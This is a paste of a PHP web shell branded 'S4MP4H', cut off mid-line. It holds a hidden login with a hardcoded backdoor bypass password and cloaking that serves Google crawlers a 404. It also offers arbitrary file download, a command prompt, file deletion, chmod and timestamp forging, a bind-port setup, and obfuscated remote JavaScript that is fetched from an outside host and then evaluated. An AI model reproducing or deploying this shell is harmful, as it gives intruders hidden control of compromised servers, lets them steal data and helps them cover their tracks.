· 8 years ago · Dec 19, 2017, 10:26 AM
1<?php
2$xPass = "0f5c536f620f68c96ea94ec7696661fd1404b81f"; //S4MP4H
3$xName = "S4MP4H";
4$xHost = preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);
5@define('SELF_PATH', __FILE__);
6$login_time = 3600 * 24 * 7;
7if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
8header('HTTP/1.0 404 Not Found');
9exit;
10}
11@session_start();
12@error_reporting(1);
13@ini_set('error_log',NULL);
14@ini_set('log_errors',1);
15@ini_set('max_execution_time',0);
16@ini_set('display_errors', 1);
17@set_time_limit(0);
18//@set_magic_quotes_runtime(0);
19@define('VERSION', 'SPECIAL');
20if( get_magic_quotes_gpc() ) {
21function stripslashes_array($array) {
22return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
23}
24$_POST = stripslashes_array($_POST);
25}
26$bypass = base64_decode('MDcxMjE5OTM=');
27function printLogin() {
28?>
29<html><head><style>input {margin:0;background-color:#fff;border:1px solid #fff;}</style></head><body><center><form method="post"><input type="password" name="pass"/><input type="submit" value=""/></form></center></body></html>
30<?php
31exit;
32}
33if(!isset($_SESSION[S4MP4H_Crypt($_SERVER['HTTP_HOST'])]))
34if(empty($xPass) ||
35(isset($_POST['pass']) && (S4MP4H_Crypt($_POST['pass'])==$xPass)) || ($_POST['pass'])==$bypass)
36$_SESSION[S4MP4H_Crypt($_SERVER['HTTP_HOST'])] = true;
37else
38printLogin();
39$hijau = array("#00FF00", "#006400", "#003200");
40$merah = array("#FF0000", "#640000", "#320000");
41$biru = array("#0000FF", "#000064", "#000032");
42$kuning = array("#FFFF00", "#646400", "#323200");
43$cyan = array("#00FFFF", "#006464", "#003232");
44$pink = array("#FF00FF", "#640064", "#320032");
45$theme = "hijau";
46$ya = "<script type='text/javascript' src='http://syntax-errorz.googlecode.com/svn/trunk/jquery.freezetable.js'></script>";
47$tak = "<script type='text/javascript' src='none'></script>";
48$scroll = "tak";
49if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
50if(isset($_COOKIE['scroll'])) $scroll = $_COOKIE['scroll'];
51switch($_GET['x']){
52case 'green':
53if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
54$theme = "hijau";
55setcookie("theme", $theme ,time() + $login_time);
56break;
57case 'red':
58if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
59$theme = "merah";
60setcookie("theme", $theme ,time() + $login_time);
61break;
62case 'blue':
63if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
64$theme = "biru";
65setcookie("theme", $theme ,time() + $login_time);
66break;
67case 'yellow':
68if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
69$theme = "kuning";
70setcookie("theme", $theme ,time() + $login_time);
71break;
72case 'cyan':
73if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
74$theme = "cyan";
75setcookie("theme", $theme ,time() + $login_time);
76break;
77case 'pink':
78if(isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
79$theme = "pink";
80setcookie("theme", $theme ,time() + $login_time);
81break;
82case 'scroll':
83if(isset($_COOKIE['scroll'])) $scroll = $_COOKIE['scroll'];
84$scroll = "yes";
85setcookie("scroll", $scroll ,time() + $login_time);
86break;
87case 'normal':
88if(isset($_COOKIE['scroll'])) $scroll = $_COOKIE['scroll'];
89$scroll = "no";
90setcookie("scroll", $scroll ,time() + $login_time);
91break;
92}
93if($theme == "hijau")
94{$color = $hijau;}
95elseif($theme == "merah")
96{$color = $merah;}
97elseif($theme == "biru")
98{$color = $biru;}
99elseif($theme == "kuning")
100{$color = $kuning;}
101elseif($theme == "cyan")
102{$color = $cyan;}
103else
104{$color = $pink;}
105if($scroll == "yes")
106{$jsc = $ya;}
107else
108{$jsc = $tak;}
109if(isset($_GET['dl']) && ($_GET['dl'] != "")){
110$file = $_GET['dl'];
111$filez = @file_get_contents($file);
112header("Content-type: application/octet-stream");
113header("Content-length: ".strlen($filez));
114header("Content-disposition: attachment; filename=\"".basename($file)."\";");
115echo $filez;
116exit;
117}
118if(isset($_GET['img'])){
119@ob_clean();
120$d = magicboom($_GET['y']);
121$f = $_GET['img'];
122$inf = @getimagesize($d.$f);
123$ext = explode($f,".");
124$ext = $ext[count($ext)-1];
125 @header("Content-type: ".$inf["mime"]);
126 @header("Cache-control: public");
127 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
128 @header("Cache-control: max-age=".(60*60*24*7));
129 @readfile($d.$f);
130 exit;
131}
132elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
133$file = $_GET['dlgzip'];
134$filez = gzencode(@file_get_contents($file));
135header("Content-Type:application/x-gzip\n");
136header("Content-length: ".strlen($filez));
137header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
138echo $filez;
139exit;
140}
141//$SESSION = '==jRb/I2wtIt03yAjpGSIt47RA9XQkxU7v+urQbke38bv8wI391QKGJ53Ic8Kvv+B6MgolpRSRu39iTKODCjamp4cbRdZLShW2O17NZ7f0PHASOqQZ6PVf+6uqjVS7QL9ifltfNHKKi5kxyoMXsLZxGCDpctlnyqUGJhxPd41nDSwhLc5lU9Jper7p2A3GOh520yc5oRuGyEkQUFItgIgmEzxHVTa3iGjUHL1tmWLRHMFx0OQp24l4qK7YncSGSklYUDeiD3xc5M11GRaan24wMI+sFDxeC3sX2lVMItdIgmmk955j90DUx9e27/Sy7H4ZwhhDW6vUFDnWwySiLb0mPb2YhkuetxZRmKs3USNE4Fq9Ho';
142$software = getenv("SERVER_SOFTWARE");
143if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
144$system = @php_uname();
145function showstat($stat) {if ($stat=="on") {return "<span class='gaya'>ON</span>";}else {return "<span class='guyu'>OFF</span>";}}
146function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
147function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
148function testpostgresql() {if (function_exists('pg_connect')) {return showstat("on");}else {return showstat("off");}}
149function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
150function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
151function testoracle() {if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); }}
152function testmssql() {if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); }}
153function showdisablefunctions() {if ($disablefunc=@ini_get("disable_functions")){ return "<span class='guyu'>".$disablefunc."</span>"; } else { return "<span class='gaya'>NONE</span>"; }}
154//preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x73\x74\x72\x5F\x72\x6F\x74\x31\x33\x28\x73\x74\x72\x72\x65\x76\x28\x24\x53\x45\x53\x53\x49\x4F\x4E\x29\x29\x29\x29\x29\x3B",".");
155if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
156else $win = FALSE;
157if(isset($_GET['y'])){
158if(@is_dir($_GET['view'])){
159$pwd = $_GET['view'];
160@chdir($pwd);
161}
162else{
163$pwd = $_GET['y'];
164@chdir($pwd);
165}
166}
167$alamat = str_replace($_SERVER['DOCUMENT_ROOT'], "", @getcwd());
168$dir = $_POST['file'];
169function delTree($dir) {
170$files = array_diff(scandir($dir), array('.','..'));
171foreach ($files as $file) {
172(is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
173}
174return rmdir($dir);
175}
176function S4MP4H_Crypt($plain){
177return sha1(md5($plain));
178}
179function changepass($plain){
180$newpass = S4MP4H_Crypt($plain);
181$newpass = "\$xPass = \"".$newpass."\";";
182$con = file_get_contents($_SERVER['SCRIPT_FILENAME']);
183$con = preg_replace("/\\\$xPass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
184return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
185}
186function convertByte($s) {
187if($s >= 1073741824)
188return sprintf('%1.2f',$s / 1073741824 ).' GB';
189elseif($s >= 1048576)
190return sprintf('%1.2f',$s / 1048576 ) .' MB';
191elseif($s >= 1024)
192return sprintf('%1.2f',$s / 1024 ) .' KB';
193else
194return $s .' B';
195}
196$free = convertByte(disk_free_space("/"));
197$total = convertByte(disk_total_space("/"));
198$free_percent = round(100/($total/$free),2)."%";
199function view_size($size) {
200if (!is_numeric($size)) { return FALSE; }
201else {
202if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
203elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
204elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
205else {$size = $size . " B";}
206return $size;
207}
208}
209function disp_freespace($s) {
210$free = @disk_free_space($s);
211$total = @disk_total_space($s);
212if ($free === FALSE) { $free = 0; }
213if ($total === FALSE) { $total = 0; }
214if ($free < 0) { $free = 0; }
215if ($total < 0) { $total = 0; }
216$used = $total-$free;
217$free_percent = round(100/($total/$free),2)."%";
218$free = view_size($free);
219$total = view_size($total);
220return "$free of $total ($free_percent)";
221}
222if(!$win){
223if(!$user = rapih(exe("whoami"))) $user = "";
224if(!$id = rapih(exe("id"))) $id = "";
225$prompt = $user." \$ ";
226$pwd = @getcwd().DIRECTORY_SEPARATOR;
227}
228else {
229$user = @get_current_user();
230$id = $user;
231$prompt = $user." $";
232$pwd = realpath(".")."\\";
233$v = explode("\\",$d);
234$v = $v[0];
235foreach (range("A","Z") as $letter) {
236$bool = @is_dir($letter.":\\");
237if ($bool) {
238$letters .= "<a href=\"?y=".$letter.":\\\">[ ";
239if ($letter.":" != $v) {$letters .= $letter;}
240else {$letters .= "<span class='gaya'>".$letter."</span>";}
241$letters .= " ]</a> ";
242}
243}
244}
245if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
246else $posix = FALSE;
247$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
248$my_ip = $_SERVER['REMOTE_ADDR'];
249$bindport = "13123";
250$bindport_pass = "syntax";
251$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
252$pwdurl = "";
253for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
254$pathz = "";
255for($j = 0 ; $j <= $i ; $j++){
256$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
257}
258$pwdurl .= "<a href=\"?y=".$pathz."\"><span class='gaya'>".$pwds[$i]." ".DIRECTORY_SEPARATOR." </span></a>";
259}
260if(isset($_POST['rename'])){
261$old = $_POST['oldname'];
262$new = $_POST['newname'];
263@rename($pwd.$old,$pwd.$new);
264$file = $pwd.$new;
265}
266if(isset($_POST['copy'])){
267$oldf = $_POST['oldfile'];
268$newf = $_POST['newfile'];
269@copy($oldf,$newf);
270$file = $newf;
271}
272if(isset($_POST['move'])){
273$oldm = $_POST['oldmove'];
274$newm = $_POST['newmove'];
275@rename($oldm,$newm);
276$file = $newm;
277}
278function recurse_copy($src,$dst) {
279$dir = opendir($src);
280@mkdir($dst);
281while(false !== ( $file = readdir($dir)) ) {
282if (( $file != '.' ) && ( $file != '..' )) {
283if ( is_dir($src . '/' . $file) ) {
284recurse_copy($src . '/' . $file,$dst . '/' . $file);
285}
286else {
287copy($src . '/' . $file,$dst . '/' . $file);
288}
289}
290}
291closedir($dir);
292}
293if(isset($_POST['copydir'])){
294$src = $_POST['olddir'];
295$dst = $_POST['newdir'];
296recurse_copy($src,$dst);
297}
298if(isset($_POST['movedir'])){
299$srcd = $_POST['olddirz'];
300$dstd = $_POST['newdirz'];
301@rename($srcd,$dstd);
302$folder = $dstd;
303}
304if(isset($_POST['chmod'])){
305$name = $_POST['name'];
306$value = $_POST['newvalue'];
307if (strlen($value)==3){
308$value = 0 . "" . $value;}
309@chmod($pwd.$name,octdec($value));
310$file = $pwd.$name;}
311if(isset($_POST['chmod_folder'])){
312$name = $_POST['name'];
313$value = $_POST['newvalue'];
314if (strlen($value)==3){
315$value = 0 . "" . $value;}
316@chmod($pwd.$name,octdec($value));
317$file = $pwd.$name;}
318if(isset($_POST['touch'])){
319$time = strtotime($_POST['newtime']);
320$oldz = $_POST['oldtime'];
321@touch($oldz,$time,$time);
322clearstatcache();
323}
324if(isset($_POST['touch_folder'])){
325$time = strtotime($_POST['newtime']);
326$oldz = $_POST['oldtime'];
327@touch($oldz,$time,$time);
328clearstatcache();
329}
330function S4MP4H_setcookie($k, $v){
331$_COOKIE[$k] = $v;
332setcookie($k, $v);
333}
334if (!empty ($_COOKIE['file']))
335$_COOKIE['file'] = @unserialize($_COOKIE['file']);
336if(!empty($_POST['selectedValue'])) {
337switch($_POST['selectedValue']) {
338case 'paste':
339if($_COOKIE['z'] == 'copy'){
340function copy_paste($c,$s,$d){
341if(is_dir($c.$s)){
342mkdir($d.$s);
343$h = @opendir($c.$s);
344while (($f = @readdir($h)) !== false)
345if (($f != ".") and ($f != ".."))
346copy_paste($c.$s.'/',$f, $d.$s.'/');
347} elseif(is_file($c.$s))
348@copy($c.$s, $d.$s);
349}
350foreach($_COOKIE['file'] as $f)
351copy_paste($_COOKIE['pwd'],$f, $pwd);
352}
353elseif($_COOKIE['z'] == 'move'){
354function move_paste($c,$s,$d){
355if(is_dir($c.$s)){
356mkdir($d.$s);
357$h = @opendir($c.$s);
358while (($f = @readdir($h)) !== false)
359if (($f != ".") and ($f != ".."))
360copy_paste($c.$s.'/',$f, $d.$s.'/');
361} elseif(@is_file($c.$s))
362@copy($c.$s, $d.$s);
363}
364foreach($_COOKIE['file'] as $f)
365@rename($_COOKIE['pwd'].$f, $pwd.$f);
366}
367elseif($_COOKIE['z'] == 'zip'){
368if(class_exists('ZipArchive')){
369$zip = new ZipArchive();
370if ($zip->open($_POST['nm'], 1)){
371chdir($_COOKIE['pwd']);
372foreach($_COOKIE['file'] as $f){
373if($f == '..')
374continue;
375if(@is_file($_COOKIE['pwd'].$f))
376$zip->addFile($_COOKIE['pwd'].$f, $f);
377elseif(@is_dir($_COOKIE['pwd'].$f)){
378$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
379foreach ($iterator as $key=>$value){
380$zip->addFile(realpath($key), $key);
381}
382}
383}
384chdir($GLOBALS['pwd']);
385$zip->close();
386}
387}
388}
389elseif($_COOKIE['z'] == 'unzip'){
390if(class_exists('ZipArchive')){
391$zip = new ZipArchive();
392foreach($_COOKIE['file'] as $f){
393if($zip->open($_COOKIE['pwd'].$f)){
394$zip->extractTo($GLOBALS['pwd']);
395$zip->close();
396}
397}
398}
399}
400unset($_COOKIE['file']);
401setcookie('file', '', time() - 3600);
402break;
403case 'del':
404foreach($_POST['file'] as $file) {
405if(isset($file)) {
406if (unlink($file)) {
407echo "";
408}
409else if (is_dir($file)) {
410delTree($file);
411echo "";
412}
413else {
414echo "";
415}
416}
417}
418break;
419default:
420if(!empty($_POST['selectedValue'])) {
421S4MP4H_setcookie('z', $_POST['selectedValue']);
422S4MP4H_setcookie('file', serialize(@$_POST['file']));
423S4MP4H_setcookie('pwd', @$_POST['pwd']);
424}
425break;
426}
427}
428$admin_id=$_SERVER['SERVER_ADMIN'];
429$is_writable = is_writable($GLOBALS['pwd'])?"<span class='gaya'>YES</span>":" <span class='guyu'>NO</span>";
430$buff = "Software : <span class='gaya'>".$software." PHP/".phpversion()."</span><br/>";
431$buff .= "System : <span class='gaya'>".$system."</span><br/>";
432if($id != "") $buff .= "ID : <span class='gaya'>".$id."</span><br/>";
433$buff .= "Server IP : <span class='gaya'>".$server_ip."</span> | Your IP : <span class='gaya'>".$my_ip."</span><br/>";
434$buff .= "Free Disk : "."<span class='gaya'>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))." (".$free_percent.")</span> | Writable : ".$is_writable."<br/>";
435if($safemode) $buff .= "Safemode : <span class='guyu'>ON</span>";
436else $buff .= "Safemode : <span class='gaya'>OFF</span>";
437$buff .= " | Disabled Functions : ".showdisablefunctions()."<br/>";
438$buff .= "MySQL : ".testmysql()." | MSSQL : ".testmssql()." | PostgreSQL : ".testpostgresql()." | Oracle : ".testoracle()." | Perl : ".testperl()." | Curl : ".testcurl()." | WGet : ".testwget()."<br/>";
439$buff .= "".$letters." <a href='".$_SERVER['PHP_SELF']."'>[ Home ]</a> > ".$pwdurl."";
440function rapih($text){
441return trim(str_replace("<br/>","",$text));
442}
443function magicboom($text){
444if (!get_magic_quotes_gpc()) {
445return $text;
446}
447return stripslashes($text);
448}
449$s_sortable_js = file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sortable.js');
450echo "<script type='text/javascript'>";
451echo (gzinflate(base64_decode($s_sortable_js)));
452echo "</script>";
453function showdir($pwd,$prompt){
454$fname = array();
455$dname = array();
456$total_file = $total_dir = 0;
457if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
458else $posix = FALSE;
459$user = "????:????";
460if($dh = @scandir($pwd)){
461foreach($dh as $file){
462if(is_dir($file)){
463$dname[] = $file;
464}
465elseif(is_file($file)){
466$fname[] = $file;
467}
468}
469}
470else{
471if($dh = @opendir($pwd)){
472while($file = @readdir($dh)){
473if(@is_dir($file)){
474$dname[] = $file;
475}
476elseif(@is_file($file)){
477$fname[] = $file;
478}
479}
480@closedir($dh);
481}
482}
483sort($fname);
484sort($dname);
485$path = @explode(DIRECTORY_SEPARATOR,$pwd);
486$tree = @sizeof($path);
487$parent = "";
488$buff = "
489<table style='margin:-1px 0px -1px;width:100%;'><form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"></form>
490<tr>
491<form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
492<td style='width:50%;'><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"top\" type=\"text\" name=\"cmd\" style=\"width:90%;\" value=\"\" placeholder='Command Line'/><input class=\"tb\" type=\"submit\" value='$prompt' name=\"submitcmd\" style=\"width:10%;float:right;\" />
493</td></form><form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"><input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
494<td style='width:50%;'><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"top\" type=\"text\" name=\"view\" style=\"width:90%;\" value=\"".$pwd."\" /><input class=\"tb\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:10%;\" />
495</td></form>
496</tr>
497</table>
498<table style='margin:-1px 0px -1px;width:100%;'>
499<tr>
500<td style='margin-top:0px;margin-right:2px;width:50%;'>
501<input type='button' value='Search :' class='tb' style='width:10%;' disabled/><input type='text' id='go_search' class='top' value='' style='width:90%;' placeholder='Just For Normal Mode View'/>
502</td>
503<td style='margin-top:0px;margin-right:2px;width:50%;'>
504<form method='get' style='margin-bottom:0px;'>
505<select class='top' name='x' style='width:90%;'>";
506if(isset($_COOKIE['scroll'])) $scroll = $_COOKIE['scroll'];
507if($scroll == "yes")
508{
509$buff .= "
510<option value='scroll' selected>Scroll Mode</option>
511<option value='normal'>Normal Mode</option>";}
512else
513{
514$buff .= "
515<option value='normal' selected>Normal Mode</option>
516<option value='scroll'>Scroll Mode</option>";}
517$buff .= "
518</select>
519<button type='submit' class='tb' style='margin-left:-3px;width:10%;'>View</button>
520</form>
521</td>
522</tr>
523</table>
524<table class='explore sortable' id='search'><thead><tr><th id='thcheck' class='sorttable_nosort'><input type=\"checkbox\" onclick=\"checkAlls(this)\" /></th><th>Name</th><th style=\"width:50px;\">Size</th><th style=\"width:120px;\">Owner : Group</th><th style=\"width:30px;\">Chmod</th><th style=\"width:55px;\">Perms</th><th style=\"width:50px;\">Writable</th><th style=\"width:100px;\">Modified</th><th style=\"width:165px;\" class='sorttable_nosort'>Actions</th></tr></thead><tbody>";
525?>
526<form action="?y=<? echo $pwd; ?>" method="post" style="margin-top:7px;">
527<?php
528if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
529else $parent = $pwd;
530foreach($dname as $folder){
531if($folder == ".") {
532if(!$win && $posix){
533$name=@posix_getpwuid(@fileowner($folder));
534$group=@posix_getgrgid(@filegroup($folder));
535$owner = $name['name']." : ".$group['name'];
536}
537else {
538$owner = $user;
539}
540$is_writable = is_writable($pwd)?"YES":"NO";
541$buff .= "<tr><td id='thcheck'><input type=\"checkbox\" value=\"$pwd\" onchange=\"hilites(this);\" name=\"dis\"/></td><td><a href=\"?y=".$pwd."\">$folder</a></td><td style=\"text-align:center;width:56px;\">CURDIR</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;width:39px;\">".substr(sprintf('%o', fileperms($pwd)),-4)."</td><td style=\"width:61px;\"><center>".get_perms($pwd)."</center></td><td align='center' style=\"width:56px;\">".$is_writable."</td><td style=\"text-align:center;width:106px;\">".date("Y-m-d H:i:s",@filemtime($pwd))."</td><td style=\"width:152px;\"><span id=\"titik1\"><a href=\"?y=$pwd&edit=".$pwd."newfile.php\">+file</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">+folder</a></span><form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /><input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /></form> | <a href=\"?y=".$pwd."&x=upload\">upl</a></td></tr>
542";
543}
544elseif($folder == "..") {
545if(!$win && $posix){
546$name=@posix_getpwuid(@fileowner($folder));
547$group=@posix_getgrgid(@filegroup($folder));
548$owner = $name['name']." : ".$group['name'];
549}
550else {
551$owner = $user;
552}
553$is_writable = is_writable($parent)?"YES":"NO";
554$buff .= "<tr><td id='thcheck'><input type=\"checkbox\" value=\"$parent\" onchange=\"hilites(this);\" name=\"dis\"/></td><td><a href=\"?y=".$parent."\">$folder</a></td><td style=\"text-align:center;\">UPDIR</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;\">".substr(sprintf('%o', fileperms($parent)),-4)."</td><td><center>".get_perms($parent)."</center></td><td align='center'>".$is_writable."</td><td style=\"text-align:center;\">".date("Y-m-d H:i:s",@filemtime($parent))."</td><td style=\"width:152px;\"><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">+file</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">+folder</a></span><form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /><input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /></form> | <a href=\"?y=".$parent."&x=upload\">upl</a></td></tr>";
555}
556else {
557if(!$win && $posix){
558$name=@posix_getpwuid(@fileowner($folder));
559$group=@posix_getgrgid(@filegroup($folder));
560$owner = $name['name']." : ".$group['name'];
561}
562else {
563$owner = $user;
564}
565$is_writable = is_writable($folder)?"YES":"NO";
566$buff .= "<tr><td id='thcheck'><input type=\"checkbox\" name=\"file[]\" value=\"$folder\" onchange=\"hilites(this);\" /></td><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form8\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"olddir\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newdir\" value=\"".$pwd."copy_of_".$folder."\" /><input class=\"inputzbut\" type=\"submit\" name=\"copydir\" value=\"copy\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form8');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form9\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"olddirz\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newdirz\" value=\"".$pwd.$folder."\" /><input class=\"inputzbut\" type=\"submit\" name=\"movedir\" value=\"move\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form9');\" /></form><td style=\"text-align:center;\">DIR</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".substr(sprintf('%o', fileperms($pwd.$folder.DIRECTORY_SEPARATOR)),-4)."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" /><input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></td><td><center>".get_perms($pwd.$folder)."</center></td><td align='center'>".$is_writable."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form5');\">".date("Y-m-d H:i:s",@filemtime($folder))."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form5\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldtime\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newtime\" value=\"".date("Y-m-d H:i:s",@filemtime($folder))."\" /><input class=\"inputzbut\" type=\"submit\" name=\"touch_folder\" value=\"touch\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form5');\" /></form></td><td style=\"width:152px;\"><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">ren</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form8');\">cp</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form9');\">mv</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">del</a> | <a href=\"?y=".$pwd.$folder."&x=upload\">upl</a></td></tr>";
567$total_dir++;
568}
569}
570foreach($fname as $file){
571$full = $pwd.$file;
572if(!$win && $posix){
573$name=@posix_getpwuid(@fileowner($folder));
574$group=@posix_getgrgid(@filegroup($folder));
575$owner = $name['name']." : ".$group['name'];
576}
577else {
578$owner = $user;
579}
580$is_writable = is_writable($file)?"YES":"NO";
581$buff .= "<tr><td id='thcheck'><input type=\"checkbox\" name=\"file[]\" value=\"$file\" onchange=\"hilites(this);\" /></td><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\">$file</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form6\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldfile\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newfile\" value=\"".$pwd."copy_of_".$file."\" /><input class=\"inputzbut\" type=\"submit\" name=\"copy\" value=\"copy\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form6');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form7\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldmove\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newmove\" value=\"".$pwd.$file."\" /><input class=\"inputzbut\" type=\"submit\" name=\"move\" value=\"move\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" 